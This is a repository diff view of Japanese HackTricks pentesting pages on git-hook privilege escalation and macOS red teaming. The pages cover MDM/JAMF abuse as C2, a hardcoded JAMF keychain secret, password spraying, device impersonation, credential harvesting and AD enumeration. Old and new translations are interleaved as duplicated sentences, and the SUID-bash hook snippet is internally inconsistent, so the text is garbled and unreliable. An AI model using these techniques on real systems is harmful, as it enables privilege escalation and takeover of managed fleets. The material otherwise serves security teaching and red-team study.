[**Git フック**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) は、git リポジトリで様々な**イベント**が発生したときに**実行される** **スクリプト**です。例えば、コミットが作成されたときやマージが行われたときなどです。したがって、**特権を持つスクリプトやユーザー**がこれらのアクションを頻繁に実行しており、`.git` フォルダに**書き込むことが可能**であれば、これを利用して**権限昇格**が可能です。
[**Git フック**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks)は、コミットが作成されたとき、マージが行われたときなど、gitリポジトリでさまざまな**イベント**で**実行**される**スクリプト**です。したがって、特権のあるスクリプトまたはユーザーがこれらのアクションを頻繁に実行し、`.git`フォルダに**書き込む**ことが可能であれば、これを**特権昇格**に利用できます。
例えば、git リポジトリの **`.git/hooks`** にスクリプトを**生成する**ことができ、新しいコミットが作成されるたびに常に実行されるようにすることができます:
たとえば、新しいコミットが作成されるたびに常に実行されるように、gitリポジトリ内の**`.git/hooks`**にスクリプトを**生成**することが可能です:
{% code overflow="wrap" %}
```bash
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit
```
```markdown
{% endcode %}
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有する。
* **HackTricks で企業を宣伝したい**、または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションを発見する
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする**
* **ハッキングトリックを共有するために、** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>
```

942
macos-hardening/macos-auto-start-locations.md
View file

File diff suppressed because it is too large Load diff

140
macos-hardening/macos-red-teaming/README.md
View file

@ -2,26 +2,26 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* あなたの**会社をHackTricksに広告掲載したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出してハッキングのコツを共有する。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
- **ハッキングテクニックを共有するには、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
## MDMの悪用
* JAMF Pro: `jamf checkJSSConnection`
* Kandji
- JAMF Pro: `jamf checkJSSConnection`
- Kandji
管理プラットフォームへのアクセスに**管理者の資格情報を侵害する**ことに成功した場合、マシンにマルウェアを配布することで**すべてのコンピューターを侵害する可能性**があります。
管理プラットフォームにアクセスするための**管理者資格情報を侵害**することができれば、マシンにマルウェアを配布することで、**すべてのコンピュータを潜在的に侵害**することができます。
MacOS環境でのレッドチーミングでは、MDMの動作についての理解が非常に推奨されます:
MacOS環境でのレッドチーミングでは、MDMの動作原理についてある程度理解していることが強く推奨されています:
{% content-ref url="macos-mdm/" %}
[macos-mdm](macos-mdm/)
@ -29,41 +29,41 @@ MacOS環境でのレッドチーミングでは、MDMの動作についての理
### MDMをC2として使用する
MDMはプロファイルのインストール、クエリ、削除、アプリケーションのインストール、ローカル管理アカウントの作成、ファームウェアパスワードの設定、FileVaultキーの変更などの権限を持っています...
MDMはプロファイルのインストール、クエリ、削除、アプリケーションのインストール、ローカル管理アカウントの作成、ファームウェアパスワードの設定、FileVaultキーの変更などの権限を持っています
のMDMを実行するには、[**https://mdmcert.download/**](https://mdmcert.download/)で試すことができるベンダーによって**署名されたCSRが必要です**。そして、Appleデバイス用の自分のMDMを実行するには、[**MicroMDM**](https://github.com/micromdm/micromdm)を使用できます。
自のMDMを実行するには、[**https://mdmcert.download/**](https://mdmcert.download/)で取得できる**ベンダーによって署名されたCSR**が必要です。Appleデバイス用の独自のMDMを実行するには、[**MicroMDM**](https://github.com/micromdm/micromdm)を使用できます。
しかし、登録されたデバイスにアプリケーションをインストールするには、開発者アカウントによって署名されている必要があります...しかし、MDM登録時に**デバイスはMDMのSSL証明書を信頼されたCAとして追加します**ので、今は何でも署名できます。
ただし、登録されたデバイスにアプリケーションをインストールするには、開発者アカウントで署名する必要があります... ただし、MDM登録時に**デバイスはMDMのSSL証明書を信頼できるCAとして追加**するため、今後は何でも署名できます。
デバイスをMDMに登録するには、ルートとして**`mobileconfig`**ファイルをインストールする必要があります。これは、zipで圧縮された**pkg**ファイルを介して配信される可能性がありますsafariからダウンロードされると解凍されます
デバイスをMDMに登録するには、ルートとして**`mobileconfig`**ファイルをインストールする必要があります。これは**pkg**ファイルを介して配信できますSafariからダウンロードされると解凍されます
**Mythic agent Orthrus**はこの技術を使用しています。
**MythicエージェントOrthrus**はこのテクニックを使用しています。
### JAMF PROの悪用
JAMFは**カスタムスクリプト**(システム管理者によって開発されたスクリプト)、**ネイティブペイロード**ローカルアカウントの作成、EFIパスワードの設定、ファイル/プロセスの監視...)、および**MDM**(デバイスの設定、デバイス証明書...)を実行できます。
JAMFは**カスタムスクリプト**(システム管理者が開発したスクリプト)、**ネイティブペイロード**ローカルアカウントの作成、EFIパスワードの設定、ファイル/プロセスの監視...)、**MDM**(デバイスの構成、デバイス証明書...)を実行できます。
#### JAMF自己登録
#### JAMF自己登録
`https://<company-name>.jamfcloud.com/enroll/`のようなページにアクセスして、**自己登録が有効になっているか**を確認します。有効になっている場合は、**アクセスするための資格情報を求められる**可能性があります。
`https://<company-name>.jamfcloud.com/enroll/`などのページに移動して、**自己登録が有効になっているかどうか**を確認します。有効になっている場合、**アクセスするための資格情報を要求**する場合があります。
パスワードスプレー攻撃を実行するために[**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py)スクリプトを使用できます。
[**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py)スクリプトを使用してパスワードスプレー攻撃を実行できます。
さらに、適切な資格情報を見つけた後、次のフォームで他のユーザー名をブルートフォースすることができるかもしれません:
さらに、適切な資格情報を見つけた後、次のフォームで他のユーザー名を総当たり攻撃することができるかもしれません:
![](<../../.gitbook/assets/image (7) (1) (1).png>)
#### JAMFデバイス認証
<figure><img src="../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
**`jamf`**バイナリにはキーチェーンを開くための秘密が含まれており、発見時点では**共有されていた**のは**`jk23ucnq91jfu9aj`**でした。\
さらに、jamfは**`/Library/LaunchAgents/com.jamf.management.agent.plist`**に**LaunchDaemon**として**永続化**ます。
**`jamf`**バイナリには、発見時点で**誰もが共有していた**キーチェーンを開くための秘密が含まれていました。それは**`jk23ucnq91jfu9aj`**でした。\
さらに、jamfは**`/Library/LaunchAgents/com.jamf.management.agent.plist`**に**LaunchDaemon**として**永続化**されます。
#### JAMFデバイス乗っ取り
#### JAMFデバイス乗っ取り
**`jamf`**が使用する**JSS**Jamf Software Server**URL**は**`/Library/Preferences/com.jamfsoftware.jamf.plist`**にあります。\
このファイルは基本的にURLを含んでいます:
このファイルには基本的にURLが含まれています:
{% code overflow="wrap" %}
```bash
@ -80,45 +80,45 @@ plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist
```
{% endcode %}
したがって、攻撃者は悪意のあるパッケージ(`pkg`)をドロップし、インストール時にこのファイルを**上書きし**、**Mythic C2リスナーへのURLをTyphonエージェントから設定する**ことで、JAMFをC2として悪用することができます。
{% code overflow="wrap" %}
したがって、攻撃者は、**このファイルを上書き**し、**TyphonエージェントからMythic C2リスナーへのURLを設定**して、JAMFをC2として悪用できるようにするために、悪意のあるパッケージ`pkg`)をドロップできます。
```bash
# After changing the URL you could wait for it to be reloaded or execute:
sudo jamf policy -id 0
# TODO: There is an ID, maybe it's possible to have the real jamf connection and another one to the C2
```
#### JAMF なりすまし
{% endcode %}
デバイスとJMFの通信を**なりすます**ためには以下が必要です:
#### JAMF Impersonation
* デバイスの**UUID**: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'`
* **JAMF キーチェーン**: `/Library/Application\ Support/Jamf/JAMF.keychain` ここにはデバイス証明書が含まれています
デバイスとJMFの間の通信を**偽装**するには、以下が必要です:
この情報を使って、**盗まれた**ハードウェア**UUID**を持つ**VMを作成**し、**SIPを無効化**して、**JAMF キーチェーンをドロップ**し、Jamf **エージェントをフック**して情報を盗みます。
* デバイスの**UUID**`ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'`
* **JAMFキーチェーン**`/Library/Application\ Support/Jamf/JAMF.keychain`(デバイス証明書を含む)
#### 秘密の盗難
この情報を使用して、**盗まれた**ハードウェア**UUID**を持つVMを作成し、**SIPを無効に**し、**JAMFキーチェーン**を落とし、Jamf **エージェント**を**フック**して情報を盗みます。
#### Secrets stealing
<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption><p>a</p></figcaption></figure>
また、管理者がJamfを介して実行したい**カスタムスクリプト**が `/Library/Application Support/Jamf/tmp/` に**配置され、実行され、削除される**のを監視することもできます。これらのスクリプトには**資格情報が含まれている可能性**があります。
また、`/Library/Application Support/Jamf/tmp/`の場所を監視して、管理者がJamfを介して実行したい**カスタムスクリプト**を監視することもできます。これらのスクリプトはここに**配置され、実行され、削除**されます。これらのスクリプトには**資格情報**が含まれる可能性があります。
しかし、**資格情報**はスクリプトに**パラメータとして渡される**こともあるため、ルートでなくても `ps aux | grep -i jamf` を監視する必要があります
ただし、これらのスクリプトには**パラメータ**として**資格情報**が渡される場合がありますので、`ps aux | grep -i jamf`を監視する必要がありますroot権限でなくても
スクリプト [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) は新しいファイルの追加と新しいプロセス引数を監視することができます。
スクリプト[**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py)は新しいファイルの追加と新しいプロセス引数を監視できます。
### macOS リモートアクセス
### macOS Remote Access
そして、**MacOS**の"特別な"**ネットワーク** **プロトコル**についても:
また、**MacOS**の"特別な"**ネットワーク** **プロトコル**についても:
{% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %}
[macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md)
{% endcontent-ref %}
## アクティブディレクトリ
## Active Directory
場合によっては、**MacOS コンピュータが AD に接続されている**ことがわかるでしょう。このシナリオでは、慣れ親しんだようにアクティブディレクトリを**列挙**するべきです。以下のページで**ヘルプ**を見つけてください:
場合によっては、**MacOSコンピュータがADに接続**されていることがあります。このシナリオでは、通常どおりにActive Directoryを列挙してみてください。以下のページで**ヘルプ**を見つけることができます:
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
@ -132,36 +132,34 @@ sudo jamf policy -id 0
[pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/)
{% endcontent-ref %}
また、役立つかもしれない**ローカル MacOS ツール**には `dscl` があります:
あなたを助ける**ローカルMacOSツール**の1つは`dscl`です:
```bash
dscl "/Active Directory/[Domain]/All Domains" ls /
```
以下は、MacOSでADを自動的に列挙し、Kerberosを操作するためのツールです
また、MacOS向けにActive Directoryの自動列挙やKerberosの操作を行うためのツールがいくつか用意されています:
* [**Machound**](https://github.com/XMCyber/MacHound): MacHoundは、MacOSホスト上のActive Directoryの関係を収集し、取り込むことを可能にするBloodhound監査ツールの拡張です。
* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrostは、macOS上のHeimdal krb5 APIと対話するために設計されたObjective-Cプロジェクトです。このプロジェクトの目的は、ターゲットに他のフレームワークやパッケージを必要とせずに、macOSデバイス上でKerberosのセキュリティテストをより良く行うために、ネイティブAPIを使用することです。
* [**Orchard**](https://github.com/its-a-feature/Orchard): Active Directoryの列挙を行うJavaScript for Automation (JXA) ツールです。
### ドメイン情報
- [**Machound**](https://github.com/XMCyber/MacHound): MacHoundはBloodhound監査ツールの拡張で、MacOSホスト上でActive Directoryの関係を収集および取り込むことができます。
- [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrostは、macOS上でHeimdal krb5 APIとやり取りするように設計されたObjective-Cプロジェクトです。このプロジェクトの目標は、macOSデバイス上でKerberosに関するセキュリティテストをネイティブAPIを使用して行うことで、対象となる環境に他のフレームワークやパッケージを必要としないようにすることです。
- [**Orchard**](https://github.com/its-a-feature/Orchard): Active Directoryの列挙を行うためのJavaScript for Automation (JXA)ツール。
```bash
echo show com.apple.opendirectoryd.ActiveDirectory | scutil
```
### ユーザー
MacOSのユーザーには3種類あります:
MacOSの3つのタイプのユーザーは次のとおりです:
* **ローカルユーザー** — ローカルのOpenDirectoryサービスによって管理されており、Active Directoryとは何の関連もありません。
* **ネットワークユーザー** — 揮発性のActive Directoryユーザーで、認証するためにDCサーバーへの接続が必要です
* **モバイルユーザー** — Active Directoryユーザーで、資格情報とファイルのローカルバックアップがあります
- **ローカルユーザー** — ローカルのOpenDirectoryサービスによって管理され、Active Directoryとは何の接続もありません。
- **ネットワークユーザー** — DCサーバーに接続して認証する必要がある、不安定なActive Directoryユーザー
- **モバイルユーザー** — 資格情報とファイルのローカルバックアップを持つActive Directoryユーザー
ユーザーやグループに関するローカル情報は、_/var/db/dslocal/nodes/Default_ フォルダに保存されています。\
例えば、_mark_ というユーザーに関する情報は _/var/db/dslocal/nodes/Default/users/mark.plist_ に、_admin_ グループに関する情報は _/var/db/dslocal/nodes/Default/groups/admin.plist_あります。
ユーザーとグループに関するローカル情報は、_var/db/dslocal/nodes/Default_ フォルダに保存されています。\
たとえば、ユーザー _mark_ に関する情報は _/var/db/dslocal/nodes/Default/users/mark.plist_保存されグループ _admin_ に関する情報は _/var/db/dslocal/nodes/Default/groups/admin.plist_保存されています。
HasSessionやAdminToのエッジを使用することに加えて、**MacHoundはBloodhoundデータベースに3つの新しいエッジを追加します**
HasSessionとAdminToエッジを使用するだけでなく、**MacHoundはBloodhoundデータベースに3つの新しいエッジを追加**します:
* **CanSSH** - ホストへのSSHが許可されたエンティティ
* **CanVNC** - ホストへのVNCが許可されたエンティティ
* **CanAE** - ホストでAppleEventスクリプトを実行することが許可されたエンティティ
- **CanSSH** - ホストにSSH接続を許可されたエンティティ
- **CanVNC** - ホストにVNC接続を許可されたエンティティ
- **CanAE** - ホストでAppleEventスクリプトを実行することが許可されたエンティティ
```bash
#User enumeration
dscl . ls /Users
@ -183,11 +181,11 @@ dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]"
#Domain Information
dsconfigad -show
```
詳細は[https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)をご覧ください
詳細は[https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)にあります
## キーチェーンへのアクセス
キーチェーンには、プロンプトを生成せずにアクセスできれば、レッドチーム演習を進めるのに役立つ可能性が高い機密情報が含まれている可能性があります:
キーチェーンには高い確率で機密情報が含まれており、プロンプトを生成せずにアクセスすることで、レッドチームの演習を進めるのに役立つ可能性があります:
{% content-ref url="macos-keychain.md" %}
[macos-keychain.md](macos-keychain.md)
@ -195,15 +193,13 @@ dsconfigad -show
## 外部サービス
MacOS レッドチーミングは、通常 **MacOS が直接いくつかの外部プラットフォームと統合されている**ため、通常の Windows レッドチーミングとは異なります。MacOS の一般的な設定では、**OneLogin と同期された資格情報を使用してコンピューターにアクセスし、OneLogin 経由でいくつかの外部サービス**github、aws など)にアクセスします:
![](<../../.gitbook/assets/image (563).png>)
MacOS Red Teamingは通常のWindows Red Teamingとは異なり、**MacOSは通常、複数の外部プラットフォームと直接統合**されています。 MacOSの一般的な構成は、**OneLoginと同期した資格情報を使用してコンピュータにアクセスし、OneLoginを介して複数の外部サービス**github、awsなどにアクセスすることです。
## その他のレッドチーム技術
### Safari
Safari でファイルをダウンロードすると、「安全な」ファイルであれば **自動的に開かれます**。例えば、**zip をダウンロードする**と、自動的に解凍されます:
Safariでファイルをダウンロードすると、"安全"なファイルの場合、**自動的に開かれます**。たとえば、**zipファイルをダウンロード**した場合、自動的に展開されます:
<figure><img src="../../.gitbook/assets/image (12) (3).png" alt=""><figcaption></figcaption></figure>
@ -214,17 +210,3 @@ Safari でファイルをダウンロードすると、「安全な」ファイ
* [**https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0**](https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0)
* [**Come to the Dark Side, We Have Apples: Turning macOS Management Evil**](https://www.youtube.com/watch?v=pOQOh07eMxY)
* [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) で AWS ハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricks をサポートする他の方法:
* **HackTricks にあなたの会社を広告したい**、または **HackTricks を PDF でダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式の PEASS & HackTricks グッズ**](https://peass.creator-spring.com)を入手してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFT**](https://opensea.io/collection/the-peass-family) コレクションをチェックしてください。
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**telegram グループ**](https://t.me/peass)に **参加するか**、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) を **フォローしてください**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の github リポジトリに PR を提出して、あなたのハッキングのコツを **共有してください**
</details>

116
macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
View file

@ -1,99 +1,71 @@
# macOS シリアル番号
# macOSシリアル番号
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) で AWS ハッキングをゼロからヒーローまで学ぶ</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
* **HackTricks にあなたの会社を広告掲載したい場合**や **HackTricks を PDF でダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式 PEASS & HackTricks グッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見する、私たちの独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクション
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の GitHub リポジトリに PR を提出して、あなたのハッキングのコツを共有する。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私をフォローする:[**@carlospolopm**](https://twitter.com/carlospolopm)**。**
- **ハッキングトリックを共有するには、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
2010年以降に製造された Apple デバイスは一般的に **12文字の英数字** のシリアル番号を持っており、**最初の3文字は製造場所**、次の **2文字** は製造された **年****週**、次の **3文字****ユニークな識別子**、そして **最後の4文字****モデル番号** を表しています。
シリアル番号の例: **C02L13ECF8J2**
## 基本情報
### **3 - 製造場所**
2010年以降のAppleデバイスは、**12文字の英数字**で構成されるシリアル番号を持ち、各セグメントが特定の情報を伝えます:
| コード | 工場 |
| -------------- | -------------------------------------------- |
| FC | ファウンテン コロラド, アメリカ |
| F | フリーモント, カリフォルニア, アメリカ |
| XA, XB, QP, G8 | アメリカ |
| RN | メキシコ |
| CK | コーク, アイルランド |
| VM | フォックスコン, パルドゥビツェ, チェコ共和国 |
| SG, E | シンガポール |
| MB | マレーシア |
| PT, CY | 韓国 |
| EE, QT, UV | 台湾 |
| FK, F1, F2 | フォックスコン 鄭州, 中国 |
| W8 | 上海 中国 |
| DL, DM | フォックスコン 中国 |
| DN | フォックスコン, 成都, 中国 |
| YM, 7J | 鴻海/フォックスコン, 中国 |
| 1C, 4H, WQ, F7 | 中国 |
| C0 | テックコム クアンタコンピュータ子会社, 中国 |
| C3 | フォックスコン, 深セン, 中国 |
| C7 | ペントラゴン, 上海, 中国 |
| RM | 改装/再製造 |
- **最初の3文字****製造場所**を示す。
- **文字4と5****製造年および週**を示す。
- **文字6から8**:各デバイスの**固有識別子**として機能する。
- **最後の4文字****モデル番号**を指定する。
### 1 - 製造年
たとえば、シリアル番号**C02L13ECF8J2**はこの構造に従います。
| コード | 発売 |
| ---- | -------------------- |
| C | 2010/2020 (前半) |
| D | 2010/2020 (後半) |
| F | 2011/2021 (前半) |
| G | 2011/2021 (後半) |
| H | 2012/... (前半) |
| J | 2012 (後半) |
| K | 2013 (前半) |
| L | 2013 (後半) |
| M | 2014 (前半) |
| N | 2014 (後半) |
| P | 2015 (前半) |
| Q | 2015 (後半) |
| R | 2016 (前半) |
| S | 2016 (後半) |
| T | 2017 (前半) |
| V | 2017 (後半) |
| W | 2018 (前半) |
| X | 2018 (後半) |
| Y | 2019 (前半) |
| Z | 2019 (後半) |
### **製造場所最初の3文字**
特定のコードは特定の工場を表します:
- **FC、F、XA/XB/QP/G8**:米国のさまざまな場所。
- **RN**:メキシコ。
- **CK**:アイルランドのコーク。
- **VM**チェコ共和国のFoxconn。
- **SG/E**:シンガポール。
- **MB**:マレーシア。
- **PT/CY**:韓国。
- **EE/QT/UV**:台湾。
- **FK/F1/F2、W8、DL/DM、DN、YM/7J、1C/4H/WQ/F7**:中国のさまざまな場所。
- **C0、C3、C7**:中国の特定の都市。
- **RM**:再生デバイス。
### 1 - 製造週
### **製造年4番目の文字**
この文字は、2010年の前半を表す 'C' から2019年の後半を表す 'Z' まで変化し、異なる文字が異なる半年ごとの期間を示します。
5番目の文字はデバイスが製造された週を表します。この位置には28の可能な文字があります: **数字の1-9は最初から9週目を表すために使用され**、**CからYの文字**、母音のA, E, I, O, Uと文字Sを**除外して**、**10週目から27週目を表します**。年の**後半に製造されたデバイスの場合、シリアル番号の5番目の文字によって表される数に26を加えます**。例えば、シリアル番号の4番目と5番目の数字が「JH」の製品は、2012年の40週目に製造されました。
### **製造週5番目の文字**
数字1〜9は週1〜9に対応します。文字C-Y母音と 'S' を除くは週10〜27を表し、年の後半ではこの数字に26が追加されます。
### 3 - ユニークコード
### **固有識別子文字6から8**
これらの3桁は、同じモデルやバッチのデバイスでも、固有のシリアル番号を持つようにします。
次の3文字は識別コードであり、**同じ年の同じ週に同じ場所で製造された同じモデルの各 Apple デバイスを区別する**ために役立ち、各デバイスが異なるシリアル番号を持つことを保証します。
### 4 - シリアル番号
シリアル番号の最後の4文字は **製品のモデル** を表します。
### **モデル番号最後の4文字**
これらの数字は、デバイスの特定のモデルを識別します。
### 参照
{% embed url="https://beetstech.com/blog/decode-meaning-behind-apple-serial-number" %}
* [https://beetstech.com/blog/decode-meaning-behind-apple-serial-number](https://beetstech.com/blog/decode-meaning-behind-apple-serial-number)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) で AWS ハッキングをゼロからヒーローまで学ぶ</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
* **HackTricks にあなたの会社を広告掲載したい場合**や **HackTricks を PDF でダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式 PEASS & HackTricks グッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見する、私たちの独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクション
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の GitHub リポジトリに PR を提出して、あなたのハッキングのコツを共有する。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私をフォローする:[**@carlospolopm**](https://twitter.com/carlospolopm)**。**
- **ハッキングトリックを共有するには、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>

108
macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
View file

@ -1,51 +1,51 @@
# macOSカーネルとシステム拡張
